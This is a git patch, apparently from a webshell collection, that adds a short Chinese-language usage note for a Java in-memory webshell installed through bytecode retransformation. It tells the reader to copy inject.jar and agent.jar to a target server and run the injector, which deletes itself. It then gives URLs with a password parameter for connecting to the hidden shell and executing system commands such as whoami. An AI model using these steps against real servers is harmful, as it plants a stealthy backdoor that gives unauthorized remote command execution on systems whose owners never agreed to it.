From 0196c72a011911665bc6ba6613829a0769f5c588 Mon Sep 17 00:00:00 2001 From: tennc <670357+tennc@users.noreply.github.com> Date: Sat, 5 Jun 2021 15:01:05 +0800 Subject: [PATCH] =?UTF-8?q?Create=20retransform=E5=AD=97=E8=8A=82=E7=A0=81?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit from: https://github.com/jweny/MemShellDemo/tree/master/MemShellForJava/%E5%AD%97%E8%8A%82%E7%A0%81%E5%A2%9E%E5%BC%BA%E5%9E%8B/retransform%E5%AD%97%E8%8A%82%E7%A0%81 --- .../retransform字节码.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 java/字节码增强型/retransform字节码.md diff --git a/java/字节码增强型/retransform字节码.md b/java/字节码增强型/retransform字节码.md new file mode 100644 index 0000000..c56fac6 --- /dev/null +++ b/java/字节码增强型/retransform字节码.md @@ -0,0 +1,19 @@ +将release中的inject.jar agent.jar复制目标服务器。 + +运行inject.jar: + +(测试时注意备份,会删除自身和agent.jar) + +```jsp +java -jar inject.jar 123 +``` + +连接内存马: +```jsp +http://ip:port/1.jsp?pass_the_world=123&model=chopper +``` + +执行命令: +```jsp +http://ip:port/1.jsp?pass_the_world=123&model=exec&cmd=whoami +```